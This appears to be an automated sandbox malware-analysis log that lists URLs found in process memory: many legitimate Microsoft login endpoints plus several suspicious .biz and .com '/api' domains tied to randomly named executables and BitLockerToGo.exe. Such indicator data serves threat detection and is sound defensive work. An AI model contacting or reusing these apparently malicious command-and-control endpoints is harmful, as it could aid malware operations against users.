Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 0000000C.00000003.2609445065.000002707D910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuer
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 0000000C.00000003.2701233025.000002707D910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2739243894.000002707DE52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dl9aDhWsNEAiwI89sB2p80O1
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 0000000C.00000003.2711380469.000002707D96D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 0000000C.00000003.2609351170.000002707D92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 0000000C.00000003.2711380469.000002707D96D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfssue
Source: svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=805024
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3408969366.000002707D102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806043
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000000C.00000003.2609987541.000002707D957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000C.00000003.2609477195.000002707D95A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp8
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3419429806.000002707DEFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000000C.00000003.2609445065.000002707D910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
Source: svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000000C.00000003.2766399530.000002707D90E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3408198545.000002707D0B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3414245555.000002707DE5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 0000000C.00000002.3408198545.000002707D0B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srfityCRL
Source: svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srff
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srfp
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
Source: svchost.exe, 0000000C.00000003.2609445065.000002707D910000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000C.00000003.2609445065.000002707D910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen
Source: svchost.exe, 0000000C.00000003.2609445065.000002707D910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000000C.00000003.2609445065.000002707D910000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
Source: BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: xkV9ZML.exe, 0000000A.00000002.2754740113.0000000001499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mercharena.biz/
Source: xkV9ZML.exe, 0000000A.00000002.2754740113.0000000001499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mercharena.biz/8
Source: xkV9ZML.exe, 0000000A.00000002.2754740113.0000000001499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mercharena.biz/=
Source: xkV9ZML.exe, 0000000A.00000002.2760755649.0000000003C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mercharena.biz/QvcP
Source: xkV9ZML.exe, 0000000A.00000002.2754740113.00000000014AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mercharena.biz/api
Source: xkV9ZML.exe, 0000000A.00000002.2760755649.0000000003C57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mercharena.biz/apivice
Source: xkV9ZML.exe, 0000000A.00000002.2754740113.0000000001499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mercharena.biz/v
Source: xkV9ZML.exe, 0000000A.00000002.2754740113.0000000001499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mercharena.biz:443/api
Source: BitLockerToGo.exe, 0000001A.00000002.3119480347.0000000000773000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000773000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mixedrecipew.biz:443/api
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.0000000000994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opbafindi.com
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.00000000009C5000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 00000026.00000002.3407509543.0000000000994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opbafindi.com/
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.00000000009C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opbafindi.com/D8oh
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.00000000009C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opbafindi.com/v8yh
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.0000000000994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opbafindi.com/ws
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.00000000009C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opbafindi.com9i
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paleboreei.biz/
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paleboreei.biz/I
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paleboreei.biz/R
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000C63000.00000004.00000020.00020000.00000000.sdmp, 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp, 4dfe6dfd76.exe, 00000013.00000002.2794070862.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paleboreei.biz/api
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000C63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paleboreei.biz/api0
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000C63000.00000004.00000020.00020000.00000000.sdmp, 4dfe6dfd76.exe, 00000013.00000002.2794070862.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paleboreei.biz/apis
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paleboreei.biz:443/api
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: BitLockerToGo.exe, 0000001A.00000002.3119480347.0000000000773000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000773000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pleasedcfrown.biz:443/api
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
